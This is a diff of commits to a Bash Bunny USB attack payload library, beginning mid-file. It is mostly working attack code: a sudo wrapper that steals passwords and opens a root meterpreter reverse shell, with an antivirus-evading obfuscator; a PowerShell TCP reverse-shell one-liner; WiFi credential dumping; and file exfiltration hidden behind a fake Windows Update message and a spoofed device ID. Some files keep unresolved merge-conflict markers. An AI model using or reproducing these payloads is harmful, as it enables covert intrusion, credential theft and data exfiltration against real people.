Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 100
# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
FILE="/root/udisk/loot/WiFiCreds/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi

27
payloads/library/credentials/WiFiCreds/readme.md
View File

@ -1,27 +0,0 @@
# WiFiCreds
* Author: illwill
* Version: Version 0.3
* Target: Windows
## Description
Dumps the stored plaintext Wifi SSID & passwords from Windows boxes using
Powershell HID attack, then stashes them in /root/udisk/loot/WiFiCreds/
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| White (blinking) | Setting up |
| Blue (blinking) | Attack running |
| Purple (blinking) | Dumping WiFi Credentials |
| Green (blinking) | Succeeded Dumping WiFi Credentials |
| Red (blinking) | Failed Dumping WiFi Credentials |
## Discussion
https://forums.hak5.org/index.php?/topic/40413-payload-wificreds/

10
payloads/library/credentials/WifiGrabber/payload.txt
View File

@ -22,17 +22,15 @@
ATTACKMODE HID STORAGE
LED R B 200
LED SETUP
LANGUAGE=us
source bunny_helpers.sh
GET SWITCH_POSITION
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
LED FINISH
else
LED R
LED FAIL
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi

200
payloads/library/credentials/bushingsBlueTurtle/blueTurtle.py Normal file
View File

@ -0,0 +1,200 @@
#!/usr/bin/env python
realSudo = "/usr/bin/sudo" #"REAL_SUDO_HERE"
pythonInterpreter = "PYTHON_EXECUTABLE_GOES_HERE"
def cantLoadModuleError():
import sys
if sys.version_info.major < 3:
return ImportError
if sys.version_info.minor < 6:
return ImportError
else:
return ModuleNotFoundError
def getLootFileName():
import os
thisFullPath = os.path.abspath(__file__)
thisDirectory = os.path.split(thisFullPath)[0]
lootFile = thisDirectory + os.sep + "sudo.conf"
return os.path.join(lootFile)
def initializeThisScript():
'''This function will be run the first time by the bunny'''
import subprocess
import re
pathFinder = subprocess.Popen("which python".split(), stdout = subprocess.PIPE)
pythonExecutable = pathFinder.stdout.read().strip()
pathFinder = subprocess.Popen("which sudo".split(), stdout = subprocess.PIPE)
sudoExecutable = pathFinder.stdout.read().strip()
try:
import json
except cantLoadModuleError():
try:
jsonInstaller = subprocess.Popen("pip install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
jsonInstaller = subprocess.Popen("pip3 install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
except:
pass
try:
import getpass
except:
try:
getPassInstaller = subprocess.Popen("pip install --user getpass".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
except:
pass
thisFileName = __file__
thisFile = open(thisFileName, 'r')
originalCode = thisFile.read()
thisFile.close()
newCode = re.sub("PYTHON_EXECUTABLE_GOES_HERE", pythonExecutable, originalCode, 1)
newCode = re.sub("REAL_SUDO_HERE", sudoExecutable, newCode, 1)
thisFile = open(thisFileName, 'w')
thisFile.write(newCode)
thisFile.close()
createLootFile(getLootFileName())
silencePayloadFile()
quit()
def createLootFile(lootFileName):
import json
initialData = {}
lootFile = open(lootFileName, 'w')
json.dump(initialData, lootFile)
lootFile.close()
def validSudoPassword(password):
import subprocess
command = [realSudo, "-S", "-b", "echo", "Echo this"]
wrapper = subprocess.Popen(command, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
wrapper.communicate(password + "\n")
#wrapper.terminate()
return not wrapper.returncode
def getPayloadFile():
import os
programDirectory = os.path.split(__file__)[0]
return programDirectory + os.sep + ".sudo"
def silencePayloadFile(): #if there is an error making our reverse https, such as a bad network connection, this will make it fail without any output
import os
payloadFileName = getPayloadFile()
if os.path.isfile(payloadFileName):
payloadFile = open(payloadFileName, 'r')
payload = payloadFile.read()
payloadFile.close()
payload = "try:\n\t" + payload + "\nexcept:\n\tpass"
payloadFile = open(payloadFileName, 'w')
payloadFile.write(payload)
payloadFile.close()
def blueTurtleShell(password): #we are going to give it a password here. It won't cause a problem if it is not needed, and it might be needed if the user was doing some long process for the sudo.
import subprocess
import os
payloadFile = getPayloadFile()
if not os.path.isfile(payloadFile):
return False
command = " ".join([realSudo, "-S", "-b", pythonInterpreter, payloadFile])
hackTheGibson = subprocess.Popen(command, stdin = subprocess.PIPE, shell = True)
hackTheGibson.communicate(password + "\n")
def runIntendedSudoCommand(): #we won't need a password here, since we just got a good sudo when we verified their password
import sys
import os
args = sys.argv[1:]
for index, arg in enumerate(args):
if arg == "sudo":
args[index] = realSudo
command = " ".join([realSudo, "-S"] + args)
os.system(command) #not using subprocess. Usually the ability to mess with stdin/out/err is useful, but it just gets in the way of delivering the true user experience here. Especially if they use something interactive like vim.
def getSudoPassword(allowedAttempts = 3):
import getpass
user = getpass.getuser()
if validSudoPassword(""): #this avoids having the program ask for a password if a valid one was just entered (normal sudo behavior). Also avoids creating a bunch of reverse shells if the user is repeatedly using sudo (that could create some noise on both ends)
return (user, "", False)
prompt = "[sudo] password for %s: " %user
fail = "Sorry, try again."
epicFail = "sudo: %s incorrect password attempts" %allowedAttempts
success = False
for i in range(allowedAttempts):
password = getpass.getpass(prompt)
if validSudoPassword(password):
success = True
break
else:
if not i == allowedAttempts - 1:
print(fail)
if not success:
import sys
print(epicFail)
sys.stdout = open("/dev/null", 'w') #sometimes this generates stray outputs if there are three failed attempts. Sending them to limbo.
sys.stderr = open("/dev/null", 'w')
sys.stdout.flush()
sys.stderr.flush()
quit()
return (user, password, True)
def loadLootFile(lootFileName):
import json
try:
file = open(lootFileName, 'r')
data = json.load(file)
file.close()
return data
except:
return False
def saveLootFile(loot, lootFileName):
import json
try:
file = open(lootFileName, 'w')
json.dump(loot, file)
file.close()
except:
pass
def parseArguments():
import sys
argList = sys.argv
if "--initializeScript" in sys.argv:
initializeThisScript()
else:
return argList
def prewrap():
parseArguments()
lootFile = getLootFileName()
loot = loadLootFile(lootFile)
try:
user, password, passwordNeeded = getSudoPassword()
except:
user = None
password = None
passwordNeeded = True
if passwordNeeded and user:
loot[user] = password
if loot:
saveLootFile(loot, lootFile)
return (user, password, passwordNeeded, loot)
def postwrap(user, password, loot):
if not passwordNeeded:
if user:
try:
password = loot[user]
except:
password = ""
blueTurtleShell(password)
if __name__ == '__main__':
parseArguments()
try:
user, password, passwordNeeded, loot = prewrap()
except:
pass
runIntendedSudoCommand()
try:
postwrap(user, password, loot)
except:
pass

115
payloads/library/credentials/bushingsBlueTurtle/payload.txt Normal file
View File

@ -0,0 +1,115 @@
#!/bin/bash
# Title: Bushing's Blue Turtle
# Author: Michael Weinstein
# Target: Mac/Linux
# Version: 0.1
#
# Create a wrapper for sudo sessions that
# will live inside ~/.config/sudo and be added
# to the $PATH. After completing the sudo task
# for the user, it will attempt an encrypted reverse
# meterpreter session. The msfvenom payload
# should be in this same directory as shell.py
# Run the following command to generate a payload,
# remember to input the appropriate IP and port
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
#
# This payload was inspired greatly by SudoBackdoor
# and much of the code here was derived (or copied
# wholesale) from that with great thanks to oXis.
#
# This one's for Bushing. Probably should have written it in Perl.
#
# White | Ready
# Amber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED SETUP
#setup the attack on macos (if false, attack is for Linux)
mac=false
if [ "$mac" = true ]
then
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening (credit audibleblink)
while ! nc -z localhost 80; do sleep 0.2; done
# that was brilliant!
LED ATTACK
if [ "$mac" = true ]
then
RUN OSX terminal
else
RUN UNITY xterm
fi
QUACK DELAY 2000
if [ "$mac" = true ]
then
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING curl "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo"
QUACK ENTER
QUACK DELAY 200
QUACK STRING curl "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo"
QUACK ENTER
QUACK DELAY 200
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
QUACK ENTER
QUACK DELAY 200
else
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo" #Will test this on a mac when I finish up
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo" #Will test this on a mac when I finish up
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
QUACK DELAY 200
QUACK ENTER
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
QUACK DELAY 200
QUACK ENTER
fi
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 200
if [ "$mac" = true ]
then
QUACK DELAY 5000 #seems like macs need some extra time on this
QUACK GUI w
else
QUACK STRING exit
QUACK DELAY 200
QUACK ENTER
fi
LED SUCCESS

13
payloads/library/credentials/bushingsBlueTurtle/post.sh Normal file
View File

@ -0,0 +1,13 @@
#!/bin/bash
chmod u+x ~/.config/sudo/sudo
if [ -f ~/.bash_profile ]
then
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
elif if [ "$(uname -s)" == "Darwin" ]
then
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
else
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
fi

11
payloads/library/credentials/bushingsBlueTurtle/pre.sh Normal file
View File

@ -0,0 +1,11 @@
#!/bin/bash
if [ ! -d ~/.config/sudo ]
then
mkdir -p ~/.config/sudo
fi
if [ -f ~/.config/ssh/sudo ]
then
rm ~/.config/ssh/sudo
fi

44
payloads/library/credentials/bushingsBlueTurtle/readme.md Normal file
View File

@ -0,0 +1,44 @@
# Bushing's Blue Turtle: The sudo subverter
* Author: Michael Weinstein (@bionomicon)
* Version: 0.1
* Target: Mac/Linux
Mad credit to oXis for their attack approach. Much of the code here was developed using SudoBackdoor as a reference.
Current dev status: I have tested this on a linux box and been able to pwn it repeatedly. Everytime getting a root reverse shell.
## Description
Injector: Creates a folder called ~/.config/sudo where it puts a python wrapper for sudo and a meterpreter payload. Next, it copies over the python sudo wrapper and meterpreter payload. It then runs the initialization function in the wrapper script to set some environmental values like the actual path for sudo and the path for python. The initialization function also initializes a file for saving sudo creds and slightly alters the meterpreter payload so it will fail silently if there is a bad network connection or other exception. Finally, it will set a new value in the user's PATH so that they will be running this wrapper instead of actually doing sudo. The main abnormality a user should see is a slight delay in being asked to enter their password. After this wrapper runs the desired sudo command, it will use the captured password (although probably not absolutely necessary at this stage) to have sudo run the meterpreter payload. That should open up a meterpreter session on the listening computer with root on the target. True pwnage. Every time they sudo something.
Cleaner: I will probably make a cleaner for this thing eventually for completeness sake... but really, why make a cleaner when this thing should give you multiple remote root shells?
## Configuration
Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode. This payload has been tested on mac and linux. Works on both mac and linux. Mac was running sophos antivirus during the test and it blocked download of the reverse tcp shell. This can be fixed with the use of my shell smuggler (see below for details).
##Crafting a meterpreter shell payload
Payloads should be crafted in msfvenom. The meterpreter shell will be the python reverse https meterpreter payload. The payload should be stored in the folder with the rest of the files for this bash bunny payload in a file called shell.py (stored on the target system as .sudo in the directory we created). The command for generating an appropriate meterpreter shell payload is below:
```msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py```
Note that *antivirus appears to pick up this reverse tcp payload* really well. Annoying. shellSmuggler.py to the rescue! The best way to run this is to cd into the bashbunny itself and then into the payloads switch folder you are running from and run the following command (plugging in your IP address and port):
```msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw | python ShellSmuggler.py > shell.py```
## STATUS (Note that I used the same configuration as SudoBackdoor, but I am seeing different LED behaviors. Will investigate this soon.)
Injector
| LED | Status |
| ---------------- | -------------------- |
| White | Ready |
| Amber blinking | Waiting for server |
| Blue blinking | Attacking |
| Green | Finished |
Cleaner (when it is made)
| LED | Status |
| ---------------- | -------------------- |
| White | Ready |
| Blue blinking | Attacking |
| Green | Finished |

1
payloads/library/credentials/bushingsBlueTurtle/shell.py Normal file
View File

@ -0,0 +1 @@
YOUR MSFVENOM REVERSE PYTHON SHELL HERE (check out the readme.md file for more instructions)

55
payloads/library/credentials/bushingsBlueTurtle/shellSmuggler.py Normal file
View File

@ -0,0 +1,55 @@
#!/usr/bin/env python3
def grabEncoded(payload):
import re
regex = re.compile("sys\.version_info\[0\]\]\((\'.+\')\)")
finder = re.search(regex, payload)
encodedAttack = finder.group(1)
payload = payload.replace(encodedAttack, "encodedAttack")
return (encodedAttack, payload)
def getPayloadFromSTDIN():
import sys
payload = sys.stdin.read()
return payload
def getPayloadFromFile(fileName):
file = open(fileName, 'r')
payload = file.read()
file.close()
return payload
def breakEncoded(encodedAttack):
encoded1 = encodedAttack[::2]
encoded2 = encodedAttack[1::2]
return (encoded1, encoded2)
def makePrepend(encoded1, encoded2):
rejoiner = "encodedAttack=''.join([''.join(item) for item in zip('%s','%s')]);" %(encoded1, encoded2)
return rejoiner
def checkForInputFile():
import sys
args = sys.argv
if len(args) > 2:
raise RuntimeError("Only valid argument is a filename")
if len(args) == 2:
return args[1]
else:
return False
fileName = checkForInputFile()
if fileName:
payload = getPayloadFromFile(fileName)
else:
payload = getPayloadFromSTDIN()
if not payload:
raise RuntimeError("No payload was given")
encodedAttack, payload = grabEncoded(payload)
encodedAttack = encodedAttack.strip("'")
encoded1, encoded2 = breakEncoded(encodedAttack)
prepend = makePrepend(encoded1, encoded2)
hiddenShell = prepend + payload
import sys
sys.stdout.write(hiddenShell)

32
payloads/library/execution/RevShellBack/README.md Normal file
View File

@ -0,0 +1,32 @@
# RevShellBack
- Author: NodePoint
- Version: 0.1.3
- Target: Windows
- Category: Execution
## Description
Set up a reverse shell and execute PowerShell/generic commands in the background from the Bash Bunny via USB ethernet.
## Configuration
Place powershell and/or generic commands between lines 53 and 58 (within the EOF).
<br>
Need to run as admin? Set the variable ADMIN to true.
<br>
Having issues obtaining a connection with the listener? Alter the time before connection attempt in NCDELAY.
## STATUS
| LED | Status |
| -------- | ----------------------------------------- |
| SETUP | Setup (attackmode, variables, networking) |
| STAGE1 | Open CMD (bypass UAC if ADMIN is true) |
| STAGE2 | Initiate reverse shell |
| SPECIAL1 | Set up listener and send out commands |
| FINISH | Finished |
## Discussion
https://forums.hak5.org/topic/41955-payload-revshellback/

62
payloads/library/execution/RevShellBack/payload.txt Normal file
View File

@ -0,0 +1,62 @@
#!/bin/bash
#
# Title: RevShellBack
# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
# Author: NodePoint
# Version: 0.1.3
# Category: Execution
# Target: Windows
# Attackmodes: Ethernet, HID
# Set attack mode
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
# Set variables
GET HOST_IP
GET TARGET_HOSTNAME
# Netcat port number
NCPORT=4444
# Delay before attempting to connect to the netcat listener (ms)
NCDELAY=200
ADMIN=false
# Setup networking
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A INPUT -i usb0 -p tcp --dport $NCPORT -j ACCEPT
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport $NCPORT -j DNAT --to-destination $HOST_IP:$NCPORT
# Open CMD
LED STAGE1
if [ "$ADMIN" = true ] ; then
# Bypass UAC
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 1500
Q ALT Y
Q DELAY 300
# Hide CMD
Q STRING "mode 18,1 & color FE & cd C:\ & title "
Q ENTER
else
# Run as normal user
RUN WIN cmd /K "mode 18,1 & color FE & cd C:\ & title "
Q DELAY 150
fi
# Initiate reverse shell
LED STAGE2
Q STRING "powershell -W Hidden \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;Start-Sleep -m $NCDELAY;\$sm=(New-Object Net.Sockets.TCPClient('$HOST_IP',$NCPORT)).GetStream();[byte[]]\$bt=0..65535|%{0};while((\$i=\$sm.Read(\$bt,0,\$bt.Length)) -ne 0){;\$d=(New-Object Text.ASCIIEncoding).GetString(\$bt,0,\$i);\$st=([text.encoding]::ASCII).GetBytes((iex \$d 2>&1));\$sm.Write(\$st,0,\$st.Length)}\" & exit"
Q ENTER
# Attack -- commands go within EOF
LED SPECIAL1
nc -q 0 -l -p $NCPORT <<EOF
echo "Hello. :)" > "C:/Users/\$env:username/Desktop/reverseshelled.txt"
\$Eject = New-Object -ComObject "Shell.Application";\$Eject.Namespace(17).Items() | Where-Object { \$_.Type -eq "CD Drive" } | foreach { \$_.InvokeVerb("Eject") }
calc;
Start-Sleep -m 300;Add-Type -AssemblyName PresentationCore,PresentationFramework;[System.Windows.MessageBox]::Show("Hello, \$env:username.\`nYour PC name is '$TARGET_HOSTNAME'.\`n\`nCheck your desktop for the file 'reverseshelled.txt'.\`nIf you have a CD/DVD drive with a disc tray, check that too.",'RevShellBack','Ok','Info')
EOF
# Done
ATTACKMODE OFF
LED FINISH

14
payloads/library/execution/exe_UACBypassD&E/payload.txt
View File

@ -2,21 +2,24 @@
# Author: Skiddie
# Version: 1.1
# Target: Windows
#
#
# Download and executes any binary executable with administrator privileges WITHOUT
# prompting the user for administrator rights (aka UAC bypass/exploit)
# Please define URL and SAVEFILENAME in the a.vbs script
# Please define URL and SAVEFILENAME in the a.vbs script
# Target does need internet connection
# Works on Windows 7 - Windows 10
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
# However from what i am aware version 7,8 and 8.1 are still effected
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
# However from what i am aware version 7,8 and 8.1 are still effected
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
#Define your bunny storage stick name
DRIVER_LABEL='BashBunny'
#RED means starting
LED R
LED SETUP
#Gets File locations
GET SWITCH_POSITION
#We are a keyboard
ATTACKMODE HID STORAGE
@ -32,4 +35,3 @@ LED G
#If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
#QUACK DELAY 4500
#shutdown 0

13
payloads/library/execution/psh_DownloadExec/payload.txt
View File

@ -10,11 +10,15 @@
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server
# ensure p.txt (your powershell payload) exists in payload directory
<<<<<<< HEAD
#
=======
#
>>>>>>> f8a442e66dc60ae47c6a4584ccdfcd5b901a386d
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | Stage 1 | Running Initial Powershell Commands |
# | Stage 3 | Delivering powershell payload |
# | Stage 2 | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID
@ -27,10 +31,17 @@ GET SWITCH_POSITION
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
SERVER_LOG=/tmp/server.log
<<<<<<< HEAD
# SERVER LOG
rm -f ${SERVER_LOG}
=======
# SERVER LOG
rm -f ${SERVER_LOG}
>>>>>>> f8a442e66dc60ae47c6a4584ccdfcd5b901a386d
# START HTTP SERVER
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &

4
payloads/library/execution/psh_DownloadExec/readme.md
View File

@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
| Attack Stage | Description |
| ------------------- | ---------------------------------------- |
| Stage 1 | Running Initial Powershell Commands |
| Stage 3 | Delivering powershell payload |
```
| Stage 2 | Delivering powershell payload |
```

5
payloads/library/execution/psh_DownloadExecSMB/payload.txt
View File

@ -13,6 +13,11 @@
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Required tools: impacket
=======
# Credentials captured by are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Required tools: impacket
#
# | Attack Stage | Description |
# | ------------------- | ------------------------------|

2
payloads/library/execution/psh_DownloadExecSMB/readme.md
View File

@ -26,4 +26,4 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
| Attack Stage | Description |
| ------------------- | ------------------------------|
| Stage 1 | Powershell |
| Stage 2 | Delivering powershell payload |
| Stage 2 | Delivering powershell payload |

13
payloads/library/exfiltration/BlackBackup/payload.txt
View File

@ -2,7 +2,7 @@
# Author: JWHeuver & JBaselier
# Version: 1.0
#
# Runs powershell script to get Wlan and logon credentials
# Runs powershell script to get Wlan and logon credentials
# from computer and save them on USB drive (Storage attack)
#
# Purple.............Loading
@ -14,19 +14,18 @@
# OPTIONS - More options available in the Powershell payload
OBFUSCATECMD="N" # Y=yes or N=no
# Source bunny_helpers.sh to get environment variable and switch_positions
source bunny_helpers.sh
#-----------------------------------
# Purple LED - initializing
LED R B 0
LED SETUP
GET SWITCH_POSITION
# Attackmode HID / Storage
ATTACKMODE HID STORAGE
#-----------------------------------
# Green LED - executing credential_powershell
LED G 0
LED STAGE1
QUACK GUI r
QUACK DELAY 300
@ -57,4 +56,4 @@ QUACK ENTER
#-----------------------------------
# Kill the lights - finished
LED 0
LED FINISH

43
payloads/library/exfiltration/FileInfoExfil/payload.txt
View File

@ -11,49 +11,40 @@
# Purple LED..................Script Started
# Yellow LED..................Ducky Script Started
# Red LED.....................Failed to run Ducky Script, see log file
#
#
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
#
LED B R
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
# Set language
QUACK SET_LANGUAGE gb
# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
#Call ducky script
LED R G
#Call ducky script
LED STAGE1
QUACK ${SWITCH_POSITION}/ducky_script.txt
QUACK DELAY 10000
LED R G B
LED FINISH
else
LED R
LED FAIL
#Red LED if unable to load script
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1

12
payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt
View File

@ -4,18 +4,18 @@
# Author: $irLurk$alot
# Version: 1.0
# Target: Windows
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn runs powershell script to copy move and extract data.
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED SETUP
GET SWITCH_POSITION
LED R 100
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
LED R B 100
LED ATTACK
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
LED R G B
LED FINISH

4
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd Normal file
View File

@ -0,0 +1,4 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit

25
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd Normal file
View File

@ -0,0 +1,25 @@
REM Setup required:
REM o Create SFE in the loot directory
REM o Place SmartFileExtract on the root of the bashbunny
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit

1
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs Normal file
View File

@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

29
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt Normal file
View File

@ -0,0 +1,29 @@
#!/bin/bash
#
# Title: ExecutableInstaller
# Author: IMcPwn (original)
# Additions: SaintCrossbow (only for the parts to run SFE)
# Version: 1.0
# Target: Windows 7+
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
# Note: Acting as Lexar Compact Flash Drive to throw off forensics
ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
QUACK DELAY 200
REM --> Minimize all windows
QUACK WINDOWS d
QUACK DELAY 200
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
QUACK ENTER
LED G

1
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md Normal file
View File

@ -0,0 +1 @@
# Exfiltrate using SmartFileExtract Utility saintcrossbow@gmail.com ### What is SmartFileExtract anyway? SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but also is usable as a standalone utility. Files are found by standard patterns (including wildcards) and then copied to any valid path. Additional features: * Find by seeking keywords in any file. * Use “curtains” that show standard progress, no window, or stealthy windows that are either inconspicuous or look just like a regular install window. * Best of all, stop the copy after a specified time or amount in MBs has been copied - or even stop it manually. No longer worry about pulling the BashBunny while in mid-operation. ### Where do I get it? Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract You will only need the SmartFileExtract.exe from the project root. ### So how does it work? SmartFileExtract runs from the command line using three mandatory parameters: the file pattern to find (/file), the drives to seek (/drive), and where to copy the found files (/copyto). There are additional options to make the extract stealthier. The SmartFileExtract documentation explains in detail, and you can also see options by typing `SmartFileExtract /help` ### What is the payload setup to do? I've included the script that I actually use, which works using IMcPwn's ExecutableInstaller: * Options are in e.cmd file * It finds all documents and any filename with the word “secret” or “pass” in it * Found files are copied to loot directory * It will kill the extract after 90 seconds or after 500 MBs are copied.

26
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt Normal file
View File

@ -0,0 +1,26 @@
Method of calling SmartFileExtractor is based on the excellent work of IMcPwn: the ExecutableInstaller.
See the BashBunny Wiki for the original version.
Setup:
- Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract
* Quick tip: you only need the SmartFileExtract.exe from the project root
- Copy SmartFileExtract.exe to the root of the bashubunny
- Change payload.txt:
a) Your file volume name for the bashbunny (if necessary)
b) What kind of device you want the bunny to spoof.
Note: Very much recommend you do this, otherwise will be picked up by forensics
- Change e.cmd:
a) Change your options for Smart File Extract here.
The default payload included in this distribution:
- Looks to Forensics like a Lexar drive (but still called BashBunny)
- Finds all files with a) the word secret or pass in the filename as well as b) any doc files
- Reports status as a fake install window
- Stops extract after 90 seconds or 500 MBs
SmartFileExtract has full documentation on how to use the utility, but if you want to kick the tires and light the fires, run:
smartfileextract /help
Good luck!
Saint Crossbow

11
payloads/library/exfiltration/ftp_exfiltrator/payload.txt
View File

@ -4,7 +4,7 @@
# Author: Nutt
# Version: 1.0
# Target: Windows
#
#
#Exfiltrates files from the users Documents folder
#FTP's all files/folders to a specified FTP site named by the victim hostname.
#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
@ -15,13 +15,12 @@
#Red............Failed - Need to work on
#Green..........Finished
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R B
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 1000
LED ATTACK
QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
QUACK ENTER
LED G
LED FINISH

1
payloads/library/exfiltration/simple-usb-extractor/i.vbs Normal file
View File

@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

6
payloads/library/exfiltration/simple-usb-extractor/payload.txt Normal file
View File

@ -0,0 +1,6 @@
# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
GET SWITCH_POSITION
LED ATTACK
